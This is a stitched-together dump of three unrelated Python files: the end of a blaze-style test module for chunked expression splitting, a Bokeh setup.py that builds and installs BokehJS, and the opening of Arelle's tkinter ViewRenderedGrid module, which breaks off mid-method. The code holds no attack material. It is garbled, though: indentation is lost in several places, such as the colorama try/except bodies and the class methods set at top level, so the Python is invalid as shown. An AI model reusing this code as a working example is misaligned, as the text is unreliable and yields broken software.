        assert chunk.shape == (4, 4)
        assert chunk_expr.shape == (1, 4)
        assert agg.shape == (6, 16)
def test_agg_shape_in_tabular_case_with_explicit_chunk():
    """Grouped tabular aggregates get a var-length dshape with widened totals."""
    t = symbol('t', '1000 * {name: string, amount: int, id: int}')
    c = symbol('chunk', 100 * t.schema)
    expr = by(t.name, total=t.amount.sum())
    (chunk, chunk_expr), (agg, agg_expr) = split(t, expr, chunk=c)
    assert agg.dshape == dshape('var * {name: string, total: int64}')
def test_reductions():
    """nunique splits into per-chunk distinct plus distinct-count aggregate."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.nunique())
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(chunk.amount.distinct())
    assert isscalar(agg.dshape.measure)
    assert agg_expr.isidentical(agg.distinct().count())

    (chunk, chunk_expr), (agg, agg_expr) = \
        split(t, t.amount.nunique(keepdims=True))
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(chunk.amount.distinct())
    assert isscalar(agg.dshape.measure)
    assert agg_expr.isidentical(agg.distinct().count(keepdims=True))
def test_by_with_single_field_child():
    """Grouping a bare field relabels the synthetic agg column back to 'x'."""
    x = symbol('x', 'var * int')
    (chunk, chunk_expr), (agg, agg_expr) = split(x, by(x, total=x.sum()))
    assert chunk_expr.isidentical(by(chunk, total=chunk.sum()))
    assert agg_expr.isidentical(by(agg[agg.fields[0]],
                                   total=agg.total.sum()).relabel({agg.fields[0]: 'x'}))
def test_keepdims_equals_true_doesnt_mess_up_agg_shape():
    """The intermediate aggregate stays a collection despite keepdims=False."""
    x = symbol('x', '10 * int')
    (chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(), keepdims=False)
    assert iscollection(agg.dshape)
def test_splittable_apply():
    """An apply marked splittable=True maps over chunks; the agg is identity."""
    def f(x):
        pass

    (chunk, chunk_expr), (agg, agg_expr) = \
        split(t, t.amount.apply(f, 'var * int', splittable=True))
    assert chunk_expr.isidentical(
        chunk.amount.apply(f, 'var * int', splittable=True))
    assert agg_expr.isidentical(agg)
| |
"""Setup script for Bokeh."""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENCE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
# Stdlib imports
import os, platform, re, shutil, site, subprocess, sys, time
from os.path import abspath, dirname, exists, isdir, join, realpath, relpath
from shutil import copy
import sys
# On Windows installs, import setuptools early (if available) so that the
# 'entry_points' argument of setup() below is honored and a bokeh.exe
# console wrapper gets created.
if 'install' in sys.argv and sys.platform.startswith('win'):
    # Try use setuptools, so that entry_points is handled, creating a bokeh.exe
    try:
        import setuptools
    except ImportError:
        pass
try:
import colorama
def bright(text): return "%s%s%s" % (colorama.Style.BRIGHT, text, colorama.Style.RESET_ALL)
def dim(text): return "%s%s%s" % (colorama.Style.DIM, text, colorama.Style.RESET_ALL)
def white(text): return "%s%s%s" % (colorama.Fore.WHITE, text, colorama.Style.RESET_ALL)
def blue(text): return "%s%s%s" % (colorama.Fore.BLUE, text, colorama.Style.RESET_ALL)
def red(text): return "%s%s%s" % (colorama.Fore.RED, text, colorama.Style.RESET_ALL)
def green(text): return "%s%s%s" % (colorama.Fore.GREEN, text, colorama.Style.RESET_ALL)
def yellow(text): return "%s%s%s" % (colorama.Fore.YELLOW, text, colorama.Style.RESET_ALL)
sys.platform == "win32" and colorama.init()
except ImportError:
def bright(text): return text
def dim(text): return text
def white(text) : return text
def blue(text) : return text
def red(text) : return text
def green(text) : return text
def yellow(text) : return text
# 'nightly' build mode: force setuptools and stamp the conda version
# (read from __conda_version__.txt) into bokeh/__conda_version__.py.
# Otherwise fall back to plain distutils.
if 'nightly' in sys.argv:
    from setuptools import setup

    sys.argv.remove('nightly')

    with open('__conda_version__.txt', 'r') as f:
        version = f.read().rstrip()

    vers_file = os.path.join('bokeh', '__conda_version__.py')
    with open(vers_file, 'w') as f:
        f.write("conda_version=" + "'" + version + "'")
else:
    from distutils.core import setup
    from distutils import dir_util
# Our own imports
import versioneer

# -----------------------------------------------------------------------------
# Globals and constants
# -----------------------------------------------------------------------------

ROOT = dirname(realpath(__file__))          # repository root
BOKEHJSROOT = join(ROOT, 'bokehjs')         # BokehJS source tree
BOKEHJSBUILD = join(BOKEHJSROOT, 'build')   # BokehJS build output
CSS = join(BOKEHJSBUILD, 'css')
JS = join(BOKEHJSBUILD, 'js')
SERVER = join(ROOT, 'bokeh/server')

# Python 2 compatibility for the interactive prompts below
if sys.version_info[0] < 3:
    input = raw_input

# -----------------------------------------------------------------------------
# Local utilities
# -----------------------------------------------------------------------------

# versioneer configuration: version is derived from git tags
versioneer.versionfile_source = 'bokeh/_version.py'
versioneer.versionfile_build = 'bokeh/_version.py'
versioneer.tag_prefix = ''  # tags are like 1.2.0
versioneer.parentdir_prefix = 'Bokeh-'  # dirname like 'myproject-1.2.0'

# -----------------------------------------------------------------------------
# Classes and functions
# -----------------------------------------------------------------------------

# ship the license inside the package; package_data is extended by
# package_path() calls further down
copy("LICENSE.txt", "bokeh/")
package_data = ['LICENSE.txt', 'themes/*.yaml']
def package_path(path, filters=()):
    """Register *path* (file or directory tree) in the package_data list.

    Paths are stored relative to the 'bokeh' package directory.

    :param path: file or directory to include
    :param filters: optional filename suffix(es) passed to str.endswith
    :raises RuntimeError: if *path* does not exist
    """
    if not os.path.exists(path):
        raise RuntimeError("packaging non-existent path: %s" % path)
    if os.path.isfile(path):
        package_data.append(relpath(path, 'bokeh'))
        return
    for dirpath, _dirs, filenames in os.walk(path):
        rel = relpath(dirpath, 'bokeh')
        for fname in filenames:
            if not filters or fname.endswith(filters):
                package_data.append(join(rel, fname))
# You can't install Bokeh in a virtualenv because the lack of getsitepackages()
# This is an open bug: https://github.com/pypa/virtualenv/issues/355
# And this is an intended PR to fix it: https://github.com/pypa/virtualenv/pull/508
# Workaround to fix our issue: https://github.com/bokeh/bokeh/issues/378
def getsitepackages():
    """Returns a list containing all global site-packages directories
    (and possibly site-python).

    Vendored replacement for ``site.getsitepackages`` because virtualenv
    does not provide it (see the issue links above).  Candidate
    directories are derived per-platform from sys.prefix/sys.exec_prefix;
    only directories that actually exist are returned.
    """
    _is_64bit = (getattr(sys, 'maxsize', None) or getattr(sys, 'maxint')) > 2**32
    _is_pypy = hasattr(sys, 'pypy_version_info')
    _is_jython = sys.platform[:4] == 'java'

    prefixes = [sys.prefix, sys.exec_prefix]

    sitepackages = []
    seen = set()

    for prefix in prefixes:
        # skip empty and duplicate prefixes (prefix == exec_prefix is common)
        if not prefix or prefix in seen:
            continue
        seen.add(prefix)

        if sys.platform in ('os2emx', 'riscos') or _is_jython:
            sitedirs = [os.path.join(prefix, "Lib", "site-packages")]
        elif _is_pypy:
            sitedirs = [os.path.join(prefix, 'site-packages')]
        elif sys.platform == 'darwin' and prefix == sys.prefix:
            if prefix.startswith("/System/Library/Frameworks/"):  # Apple's Python
                sitedirs = [os.path.join("/Library/Python", sys.version[:3], "site-packages"),
                            os.path.join(prefix, "Extras", "lib", "python")]
            else:  # any other Python distros on OSX work this way
                sitedirs = [os.path.join(prefix, "lib",
                                         "python" + sys.version[:3], "site-packages")]
        elif os.sep == '/':
            # generic POSIX layout
            sitedirs = [os.path.join(prefix,
                                     "lib",
                                     "python" + sys.version[:3],
                                     "site-packages"),
                        os.path.join(prefix, "lib", "site-python"),
                        ]
            lib64_dir = os.path.join(prefix, "lib64", "python" + sys.version[:3], "site-packages")
            if (os.path.exists(lib64_dir) and
                    os.path.realpath(lib64_dir) not in [os.path.realpath(p) for p in sitedirs]):
                if _is_64bit:
                    sitedirs.insert(0, lib64_dir)
                else:
                    sitedirs.append(lib64_dir)
            try:
                # sys.getobjects only available in --with-pydebug build
                sys.getobjects
                sitedirs.insert(0, os.path.join(sitedirs[0], 'debug'))
            except AttributeError:
                pass
            # Debian-specific dist-packages directories:
            sitedirs.append(os.path.join(prefix, "local/lib",
                                         "python" + sys.version[:3],
                                         "dist-packages"))
            sitedirs.append(os.path.join(prefix, "lib",
                                         "python" + sys.version[:3],
                                         "dist-packages"))
            if sys.version_info[0] >= 3:
                sitedirs.append(os.path.join(prefix, "lib",
                                             "python" + sys.version[0],
                                             "dist-packages"))
            sitedirs.append(os.path.join(prefix, "lib", "dist-python"))
        else:
            # Windows and anything else
            sitedirs = [os.path.join(prefix, "lib", "site-packages"), prefix]
        if sys.platform == 'darwin':
            # for framework builds *only* we add the standard Apple
            # locations. Currently only per-user, but /Library and
            # /Network/Library could be added too
            if 'Python.framework' in prefix:
                home = os.environ.get('HOME')
                if home:
                    sitedirs.append(
                        os.path.join(home,
                                     'Library',
                                     'Python',
                                     sys.version[:3],
                                     'site-packages'))
        for sitedir in sitedirs:
            sitepackages.append(os.path.abspath(sitedir))

    # keep only directories that actually exist
    sitepackages = [p for p in sitepackages if os.path.isdir(p)]
    return sitepackages
def check_remove_bokeh_install(site_packages):
    """Find prior Bokeh installs under *site_packages* and offer to delete them.

    Interactive: prompts the user, and exits the process when removal
    fails or the user declines.
    """
    old_bokeh_files = []
    for d in os.listdir(site_packages):
        bokeh_path = join(site_packages, d)
        # match the package dir and egg/dist dirs like 'bokeh-0.x...'
        if not (d == 'bokeh' or d.startswith('bokeh-')):
            continue
        old_bokeh_files.append(bokeh_path)

    if len(old_bokeh_files) == 0:
        return

    print("Found old Bokeh files:")
    for path in old_bokeh_files:
        print(" - %s" % path)
    val = input("Remove %s? [y|N] " % ("it" if len(old_bokeh_files)==1 else "them",))
    if val == "y":
        print("Removing old Bokeh files...", end=" ")
        for path in old_bokeh_files:
            try:
                if isdir(path): shutil.rmtree(path)
                else: os.remove(path)
            except (IOError, OSError) as e:
                print(bright(red("\nUnable to remove old Bokeh file at %s, exiting" % path)) + " [reason: %s]" % e)
                sys.exit(-1)
        print("Done")
    else:
        print(bright(red("Old Bokeh files not removed, exiting.")))
        sys.exit(1)
def remove_bokeh_pth(path_file):
    """Delete an existing bokeh.pth development path file.

    :returns: True when a file was removed, False when none existed
    """
    if not exists(path_file):
        return False
    try:
        os.remove(path_file)
    except (IOError, OSError):
        print(bright(red("Unable to remove old path file at %s, exiting" % path_file)))
        sys.exit(-1)
    return True
# Pre-rendered, colorized console messages used by build_js() below.
# Each is a %-format template filled in at the point of failure/success.
BUILD_EXEC_FAIL_MSG = bright(red("Failed.")) + """
ERROR: subprocess.Popen(%r) failed to execute:
%s
Have you run `npm install` from the bokehjs subdirectory?
For more information, see the Dev Guide:
http://bokeh.pydata.org/en/latest/docs/dev_guide.html
"""

BUILD_FAIL_MSG = bright(red("Failed.")) + """
ERROR: 'gulp build' returned the following
---- on stdout:
%s
---- on stderr:
%s
"""

BUILD_SIZE_FAIL_MSG = """
ERROR: could not determine sizes:
%s
"""

BUILD_SUCCESS_MSG = bright(green("Success!")) + """
Build output:
%s"""
def build_js():
    """Compile BokehJS with gulp and report build results and artifact sizes.

    Runs gulp from the bokehjs/ subdirectory, always restoring the original
    working directory, and exits the process when the build cannot run or
    returns a non-zero status.
    """
    print("Building BokehJS... ", end="")
    sys.stdout.flush()
    os.chdir('bokehjs')

    if sys.platform != "win32":
        cmd = [join('node_modules', '.bin', 'gulp'), 'build']
    else:
        cmd = [join('node_modules', '.bin', 'gulp.cmd'), 'build']

    t0 = time.time()
    try:
        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # communicate() drains both pipes while waiting; the previous
        # proc.wait() + later read() could deadlock once the child filled
        # an OS pipe buffer.
        out, err = proc.communicate()
    except OSError as e:
        print(BUILD_EXEC_FAIL_MSG % (cmd, e))
        sys.exit(1)
    finally:
        os.chdir('..')
    result = proc.returncode
    t1 = time.time()

    if result != 0:
        outmsg = out.decode('ascii', errors='ignore')
        outmsg = "\n".join([" " + x for x in outmsg.split("\n")])
        errmsg = err.decode('ascii', errors='ignore')
        errmsg = "\n".join([" " + x for x in errmsg.split("\n")])
        print(BUILD_FAIL_MSG % (red(outmsg), red(errmsg)))
        sys.exit(1)

    indented_msg = ""
    msg = out.decode('ascii', errors='ignore')
    pat = re.compile(r"(\[.*\]) (.*)", re.DOTALL)
    for line in msg.strip().split("\n"):
        m = pat.match(line)
        if not m: continue  # skip generate.py output lines
        stamp, txt = m.groups()
        indented_msg += " " + dim(green(stamp)) + " " + dim(txt) + "\n"
    msg = "\n".join([" " + x for x in msg.split("\n")])
    print(BUILD_SUCCESS_MSG % indented_msg)
    print("Build time: %s" % bright(yellow("%0.1f seconds" % (t1-t0))))
    print()
    print("Build artifact sizes:")
    try:
        def size(*path):
            # artifact size in KB
            return os.stat(join("bokehjs", "build", *path)).st_size / 2**10
        print(" - bokeh.js : %6.1f KB" % size("js", "bokeh.js"))
        print(" - bokeh.css : %6.1f KB" % size("css", "bokeh.css"))
        print(" - bokeh.min.js : %6.1f KB" % size("js", "bokeh.min.js"))
        print(" - bokeh.min.css : %6.1f KB" % size("css", "bokeh.min.css"))
        print(" - bokeh-widgets.js : %6.1f KB" % size("js", "bokeh-widgets.js"))
        print(" - bokeh-widgets.css : %6.1f KB" % size("css", "bokeh-widgets.css"))
        print(" - bokeh-widgets.min.js : %6.1f KB" % size("js", "bokeh-widgets.min.js"))
        print(" - bokeh-widgets.min.css : %6.1f KB" % size("css", "bokeh-widgets.min.css"))
        print(" - bokeh-api.js : %6.1f KB" % size("js", "bokeh-api.js"))
        print(" - bokeh-api.min.js : %6.1f KB" % size("js", "bokeh-api.min.js"))
        print(" - bokeh-compiler.js : %6.1f KB" % size("js", "bokeh-compiler.js"))
        print(" - bokeh-compiler.min.js : %6.1f KB" % size("js", "bokeh-compiler.min.js"))
    except Exception as e:
        print(BUILD_SIZE_FAIL_MSG % e)
def install_js():
    """Copy the built BokehJS artifacts into bokeh/server/static.

    Exits the process when the required build outputs are missing.
    """
    target_jsdir = join(SERVER, 'static', 'js')
    target_cssdir = join(SERVER, 'static', 'css')

    required = (
        join(JS, 'bokeh.js'),
        join(JS, 'bokeh.min.js'),
        join(CSS, 'bokeh.css'),
        join(CSS, 'bokeh.min.css'),
    )
    if not all(exists(asset) for asset in required):
        print("""
ERROR: Cannot install BokehJS: files missing in `./bokehjs/build`.
Please build BokehJS by running setup.py with the `--build_js` option.
Dev Guide: http://bokeh.pydata.org/docs/dev_guide.html#bokehjs.
""")
        sys.exit(1)

    # replace any previously installed static assets wholesale
    for source, target in ((JS, target_jsdir), (CSS, target_cssdir)):
        if exists(target):
            shutil.rmtree(target)
        shutil.copytree(source, target)
def clean():
    """Remove the previous build tree and all compiled .pyc files."""
    print("Removing prior-built items...", end=" ")

    build_dir = 'build/lib/bokeh'
    if os.path.exists(build_dir):
        dir_util.remove_tree(build_dir)

    for root, _dirs, files in os.walk('.'):
        for name in files:
            if name.endswith('.pyc'):
                os.remove(os.path.join(root, name))

    print("Done")
def get_user_jsargs():
    """Interactively ask whether to rebuild BokehJS or reuse the last build.

    :returns: True to build fresh, False to install the previous build
    """
    print("""
Bokeh includes a JavaScript library (BokehJS) that has its own
build process. How would you like to handle BokehJS:
1) build and install fresh BokehJS
2) install last built BokehJS from bokeh/bokehjs/build
""")
    choices = {"1": True, "2": False}
    while True:
        answer = input("Choice? ")
        if answer in choices:
            return choices[answer]
        print("Input '%s' not understood. Valid choices: 1, 2\n" % answer)
def parse_jsargs():
    """Consume the --build_js/--install_js flags from sys.argv.

    :returns: True when BokehJS should be rebuilt, False otherwise
    """
    installing = any(
        arg in sys.argv
        for arg in ('install', 'develop', 'sdist', 'egg_info', 'build'))

    if '--build_js' in sys.argv:
        if not installing:
            print("Error: Option '--build_js' only valid with 'install', 'develop', 'sdist', or 'build', exiting.")
            sys.exit(1)
        sys.argv.remove('--build_js')
        return True

    if '--install_js' in sys.argv:
        # Note that --install_js can be used by itself (without sdist/install/develop)
        sys.argv.remove('--install_js')
        return False

    # no explicit flag: prompt only when actually installing
    return get_user_jsargs() if installing else False
def package_tree(pkgroot):
    """Return dotted package names for every directory under *pkgroot*
    (relative to ROOT) that contains an __init__.py.
    """
    return [
        os.path.relpath(dirpath, ROOT).replace(os.path.sep, '.')
        for dirpath, _dirnames, filenames in os.walk(os.path.join(ROOT, pkgroot))
        if '__init__.py' in filenames
    ]
# -----------------------------------------------------------------------------
# Main script
# -----------------------------------------------------------------------------

# Aliases for build_js and install_js: accept the dashed spellings too.
# (enumerate instead of range(len(...)) -- same in-place rewrite, idiomatic)
for i, arg in enumerate(sys.argv):
    if arg == '--build-js':
        sys.argv[i] = '--build_js'
    elif arg == '--install-js':
        sys.argv[i] = '--install_js'
# Set up this checkout or source archive with the right BokehJS files.

if sys.version_info[:2] < (2, 6):
    raise RuntimeError("Bokeh requires python >= 2.6")

# Lightweight command to only install js and nothing more - developer mode
if len(sys.argv) == 2 and sys.argv[-1] == '--install_js':
    install_js()
    sys.exit(0)

# check for 'sdist' and make sure we always do a BokehJS build when packaging
if "sdist" in sys.argv:
    if "--install_js" in sys.argv:
        print("Removing '--install_js' incompatible with 'sdist'")
        sys.argv.remove('--install_js')
    if "--build_js" not in sys.argv:
        print("Adding '--build_js' required for 'sdist'")
        sys.argv.append('--build_js')

# check for package install, set jsinstall to False to skip prompt
# (MANIFEST.in is only present in a full repository checkout, so its
# absence signals an sdist package where BokehJS sources are not shipped)
jsinstall = True
if not exists(join(ROOT, 'MANIFEST.in')):
    if "--build_js" in sys.argv or "--install_js" in sys.argv:
        print("BokehJS source code is not shipped in sdist packages; "
              "building/installing from the bokehjs source directory is disabled. "
              "To build or develop BokehJS yourself, you must clone the full "
              "Bokeh repository from https://github.com/bokeh/bokeh")
        if "--build_js" in sys.argv:
            sys.argv.remove('--build_js')
        if "--install_js" in sys.argv:
            sys.argv.remove('--install_js')
    jsbuild = False
    jsinstall = False
else:
    jsbuild = parse_jsargs()

if jsbuild:
    build_js()

if jsinstall:
    install_js()

# static assets and data files to bundle into the package
sampledata_suffixes = ('.csv', '.conf', '.gz', '.json', '.png', '.ics', '.geojson')

package_path(join(SERVER, 'static'))
package_path(join(ROOT, 'bokeh', 'core', '_templates'))
# NOTE(review): ('.html') is a plain string, not a 1-tuple; str.endswith
# accepts either, so this works as intended
package_path(join(ROOT, 'bokeh', 'server', 'views'), ('.html'))
package_path(join(ROOT, 'bokeh', 'sampledata'), sampledata_suffixes)

# pick the site-packages dir that the .pth file / install checks target
if '--user' in sys.argv:
    site_packages = site.USER_SITE
else:
    site_packages = getsitepackages()[0]

path_file = join(site_packages, "bokeh.pth")
path = abspath(dirname(__file__))

print()
if 'develop' in sys.argv:
    # Note that setuptools supports 'develop' too, but we roll our own implementation
    # that removes any existing Bokeh installation, and works in virtualenv
    if exists('bokeh/__conda_version__.py'):
        print(bright(red("ERROR:")) + " Detected a __conda_version__.py file, exiting")
        sys.exit(1)
    check_remove_bokeh_install(site_packages)
    # a .pth file pointing at this checkout stands in for an install
    with open(path_file, "w+") as f:
        f.write(path)
    print("Installing Bokeh for development:")
    print(" - writing path '%s' to %s" % (path, path_file))
    if jsinstall:
        print(" - using %s built BokehJS from bokehjs/build\n" % (bright(yellow("NEWLY")) if jsbuild else bright(yellow("PREVIOUSLY"))))
    else:
        print(" - using %s BokehJS, located in 'bokeh.server.static'\n" % yellow("PACKAGED"))
    sys.exit()
elif 'clean' in sys.argv:
    clean()
elif 'install' in sys.argv:
    # a leftover development .pth file would shadow the real install
    pth_removed = remove_bokeh_pth(path_file)
    print("Installing Bokeh:")
    if pth_removed:
        print(" - removed path file at %s" % path_file)
    if jsinstall:
        print(" - using %s built BokehJS from bokehjs/build\n" % (bright(yellow("NEWLY")) if jsbuild else bright(yellow("PREVIOUSLY"))))
    else:
        print(" - using %s BokehJS, located in 'bokeh.server.static'\n" % bright(yellow("PACKAGED")))
elif '--help' in sys.argv:
    if jsinstall:
        print("Bokeh-specific options available with 'install' or 'develop':")
        print()
        print("  --build_js          build and install a fresh BokehJS")
        print("  --install_js        install only last previously built BokehJS")
    else:
        print("Bokeh is using PACKAGED BokehJS, located in 'bokeh.server.static'")
        print()
print()
# Runtime dependencies for setup(); a py2.7-only backport is appended below.
REQUIRES = [
    'six>=1.5.2',
    'requests>=1.2.3',
    'PyYAML>=3.10',
    'python-dateutil>=2.1',
    'Jinja2>=2.7',
    'numpy>=1.7.1',
    'tornado>=4.3',
]
if sys.version_info[:2] == (2, 7):
    # concurrent.futures backport is only needed (and installable) on py2.7
    REQUIRES.append('futures>=3.0.3')

# version string and command classes are managed by versioneer
_version = versioneer.get_version()
_cmdclass = versioneer.get_cmdclass()

# Horrible hack: workaround to allow creation of bdist_wheel on pip installation
# Why, for God's sake, is pip forcing the generation of wheels when installing a package?
try:
    from wheel.bdist_wheel import bdist_wheel
except ImportError:  # fix: exception object was bound as 'e' but never used
    # pip is not claiming for bdist_wheel when wheel is not installed
    bdist_wheel = None
if bdist_wheel is not None:
    _cmdclass["bdist_wheel"] = bdist_wheel
# Note on scripts and entry points. The 'scripts' value is handled by
# distutils but does not provide an .exe, making it not very useful on
# Windows. The 'entry_points' value is handled only if setuptools is
# used, and does make an .exe. Note that in our conda recipe, we
# separately define an entry point.
setup(
    name='bokeh',
    version=_version,    # computed by versioneer above
    cmdclass=_cmdclass,  # versioneer commands plus optional bdist_wheel
    packages=package_tree('bokeh'),
    package_data={'bokeh': package_data},
    author='Continuum Analytics',
    author_email='info@continuum.io',
    url='http://github.com/bokeh/bokeh',
    description='Statistical and novel interactive HTML plots for Python',
    license='New BSD',
    scripts=['bin/bokeh', 'bin/bokeh-server'],
    entry_points={'console_scripts': ['bokeh = bokeh.__main__:main',], },
    zip_safe=False,  # package must be installed unzipped
    install_requires=REQUIRES
)
| |
'''
Created on Oct 5, 2010
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
import os, threading, time, logging
from tkinter import Menu, BooleanVar, font as tkFont
from arelle import (ViewWinTkTable, ModelDocument, ModelDtsObject, ModelInstanceObject, XbrlConst,
ModelXbrl, Locale, FunctionXfi,
ValidateXbrlDimensions)
from arelle.ModelValue import qname, QName
from arelle.RenderingResolver import resolveAxesStructure, RENDER_UNITS_PER_CHAR
from arelle.ModelFormulaObject import Aspect, aspectModels, aspectModelAspect
from arelle.ModelInstanceObject import ModelDimensionValue
from arelle.ModelRenderingObject import (ModelClosedDefinitionNode, ModelEuAxisCoord,
ModelFilterDefinitionNode,
OPEN_ASPECT_ENTRY_SURROGATE)
from arelle.FormulaEvaluator import init as formulaEvaluatorInit, aspectMatches
from arelle.PrototypeInstanceObject import FactPrototype
from arelle.UITkTable import XbrlTable
from arelle.DialogNewFactItem import getNewFactItemOptions
from collections import defaultdict
from arelle.ValidateXbrl import ValidateXbrl
from arelle.XbrlConst import eurofilingModelNamespace, eurofilingModelPrefix
from arelle.ValidateXbrlDimensions import isFactDimensionallyValid
from arelle.XmlValidate import UNVALIDATED, validate as xmlValidate
try:
from tkinter import ttk
_Combobox = ttk.Combobox
except ImportError:
from ttk import Combobox
_Combobox = Combobox
# shared empty default for "no aspect values" (treated as read-only)
emptyList = []
ENTRY_WIDTH_IN_CHARS = 12 # width of a data column entry cell in characters (nominal)
ENTRY_WIDTH_SCREEN_UNITS = 100  # nominal entry-cell width in screen units
PADDING = 20 # screen units of padding between entry cells
# type qnames used by getbackgroundColor to pick the percent cell color
qnPercentItemType = qname("{http://www.xbrl.org/dtr/type/numeric}num:percentItemType")
qnPureItemType = qname("{http://www.xbrl.org/2003/instance}xbrli:pureItemType")
# xbrli base types treated as integer-valued when selecting cell colors
integerItemTypes = {"integerItemType", "nonPositiveIntegerItemType", "negativeIntegerItemType",
                    "longItemType", "intItemType", "shortItemType", "byteItemType",
                    "nonNegativeIntegerItemType", "unsignedLongItemType", "unsignedIntItemType",
                    "unsignedShortItemType", "unsignedByteItemType", "positiveIntegerItemType"}
# arcroles (across table-linkbase spec versions) that identify table breakdowns
TABLE_AXIS_ROLES = (XbrlConst.euTableAxis, XbrlConst.tableBreakdown, XbrlConst.tableBreakdownMMDD, XbrlConst.tableBreakdown201305, XbrlConst.tableBreakdown201301, XbrlConst.tableAxis2011)
def getTableAxisArcroles():
    '''
    Returns a tuple with all known table axis roles
    '''
    # fix: the description above was previously a no-op module-level string
    # expression preceding the def; it now documents the function properly.
    return TABLE_AXIS_ROLES
def viewRenderedGrid(modelXbrl, tabWin, lang=None):
    """Create a rendered-table view in the given tab window, build its
    Options/Tables/Save menus, bind mouse/focus events, perform the initial
    rendering, and return the view.

    :param modelXbrl: loaded XBRL model to render
    :param tabWin: tk tab container hosting the view frame
    :param lang: preferred label language code, or None for default
    :return: the constructed ViewRenderedGrid
    """
    modelXbrl.modelManager.showStatus(_("viewing rendering"))
    view = ViewRenderedGrid(modelXbrl, tabWin, lang)
    # suppress menu-driven redraws while the menus are being constructed
    view.blockMenuEvents = 1
    menu = view.contextMenu()
    optionsMenu = Menu(view.viewFrame, tearoff=0)
    optionsMenu.add_command(label=_("New fact item options"), underline=0, command=lambda: getNewFactItemOptions(modelXbrl.modelManager.cntlr, view.newFactItemOptions))
    optionsMenu.add_command(label=_("Open breakdown entry rows"), underline=0, command=view.setOpenBreakdownEntryRows)
    # each option variable triggers a view reload when written ("w" trace)
    view.ignoreDimValidity.trace("w", view.viewReloadDueToMenuAction)
    optionsMenu.add_checkbutton(label=_("Ignore Dimensional Validity"), underline=0, variable=view.ignoreDimValidity, onvalue=True, offvalue=False)
    view.xAxisChildrenFirst.trace("w", view.viewReloadDueToMenuAction)
    optionsMenu.add_checkbutton(label=_("X-Axis Children First"), underline=0, variable=view.xAxisChildrenFirst, onvalue=True, offvalue=False)
    view.yAxisChildrenFirst.trace("w", view.viewReloadDueToMenuAction)
    optionsMenu.add_checkbutton(label=_("Y-Axis Children First"), underline=0, variable=view.yAxisChildrenFirst, onvalue=True, offvalue=False)
    menu.add_cascade(label=_("Options"), menu=optionsMenu, underline=0)
    # Tables menu is populated later by view.loadTablesMenu()
    view.tablesMenu = Menu(view.viewFrame, tearoff=0)
    menu.add_cascade(label=_("Tables"), menu=view.tablesMenu, underline=0)
    view.tablesMenuLength = 0
    view.menuAddLangs()
    saveMenu = Menu(view.viewFrame, tearoff=0)
    saveMenu.add_command(label=_("HTML file"), underline=0, command=lambda: view.modelXbrl.modelManager.cntlr.fileSave(view=view, fileType="html"))
    saveMenu.add_command(label=_("Layout model"), underline=0, command=lambda: view.modelXbrl.modelManager.cntlr.fileSave(view=view, fileType="xml"))
    saveMenu.add_command(label=_("XBRL instance"), underline=0, command=view.saveInstance)
    menu.add_cascade(label=_("Save"), menu=saveMenu, underline=0)
    view.view()  # initial rendering
    view.blockSelectEvent = 1
    view.blockViewModelObject = 0
    view.viewFrame.bind("<Enter>", view.cellEnter, '+')
    view.viewFrame.bind("<Leave>", view.cellLeave, '+')
    view.viewFrame.bind("<FocusOut>", view.onQuitView, '+')
    view.viewFrame.bind("<1>", view.onClick, '+') # does not currently work (since tktable changes)
    view.viewFrame.bind("<Configure>", view.onConfigure, '+') # frame resized, redo column header wrap length ratios
    view.blockMenuEvents = 0
    return view
class ViewRenderedGrid(ViewWinTkTable.ViewTkTable):
def __init__(self, modelXbrl, tabWin, lang):
    """Initialize per-view state on top of the generic tk table view.

    :param modelXbrl: XBRL model to render
    :param tabWin: tk tab container hosting the view
    :param lang: preferred label language code or None
    """
    super(ViewRenderedGrid, self).__init__(modelXbrl, tabWin, _("Table"),
                                           False, lang, self.onQuitView)
    self.newFactItemOptions = ModelInstanceObject.NewFactItemOptions(xbrlInstance=modelXbrl)
    self.factPrototypes = []
    # open-aspect entry surrogate id -> structural node / combobox cell
    self.aspectEntryObjectIdsNode = {}
    self.aspectEntryObjectIdsCell = {}
    self.factPrototypeAspectEntryObjectIds = defaultdict(set)
    self.zOrdinateChoices = None  # None until first view() initializes it
    # context menu Boolean vars
    # options persist in the controller config (saved when exiting)
    self.options = self.modelXbrl.modelManager.cntlr.config.setdefault("viewRenderedGridOptions", {})
    self.openBreakdownLines = self.options.setdefault("openBreakdownLines", 5) # ensure there is a default entry
    self.ignoreDimValidity = BooleanVar(value=self.options.setdefault("ignoreDimValidity",True))
    self.xAxisChildrenFirst = BooleanVar(value=self.options.setdefault("xAxisChildrenFirst",True))
    self.yAxisChildrenFirst = BooleanVar(value=self.options.setdefault("yAxisChildrenFirst",False))
    formulaEvaluatorInit() # one-time module initialization
def close(self):
    """Tear down the view: release fact prototypes and per-view caches
    after the base-class close, then drop the rendering context reference."""
    super(ViewRenderedGrid, self).close()
    if not self.modelXbrl:
        return
    for prototype in self.factPrototypes:
        prototype.clear()
    self.factPrototypes = None
    self.aspectEntryObjectIdsNode.clear()
    self.aspectEntryObjectIdsCell.clear()
    # drop only our reference; the context may be shared and still in use
    self.rendrCntx = None
def loadTablesMenu(self):
    """Scan the DTS for renderable tables and rebuild the Tables menu.

    Populates self.tablesToELR (table objectId -> extended link role URI),
    rebuilds the menu entries sorted by table definition label, and sets
    self.tblELR to the first table so it becomes the initial view.
    """
    tblMenuEntries = {}  # role definition label -> linkrole URI
    tblRelSet = self.modelXbrl.relationshipSet("Table-rendering")
    self.tablesToELR = {}
    for tblLinkroleUri in tblRelSet.linkRoleUris:
        # try each known table-axis arcrole (spec versions) for this linkrole
        for tableAxisArcrole in getTableAxisArcroles():
            tblAxisRelSet = self.modelXbrl.relationshipSet(tableAxisArcrole, tblLinkroleUri)
            if tblAxisRelSet and len(tblAxisRelSet.modelRelationships) > 0:
                # table name
                modelRoleTypes = self.modelXbrl.roleTypes.get(tblLinkroleUri)
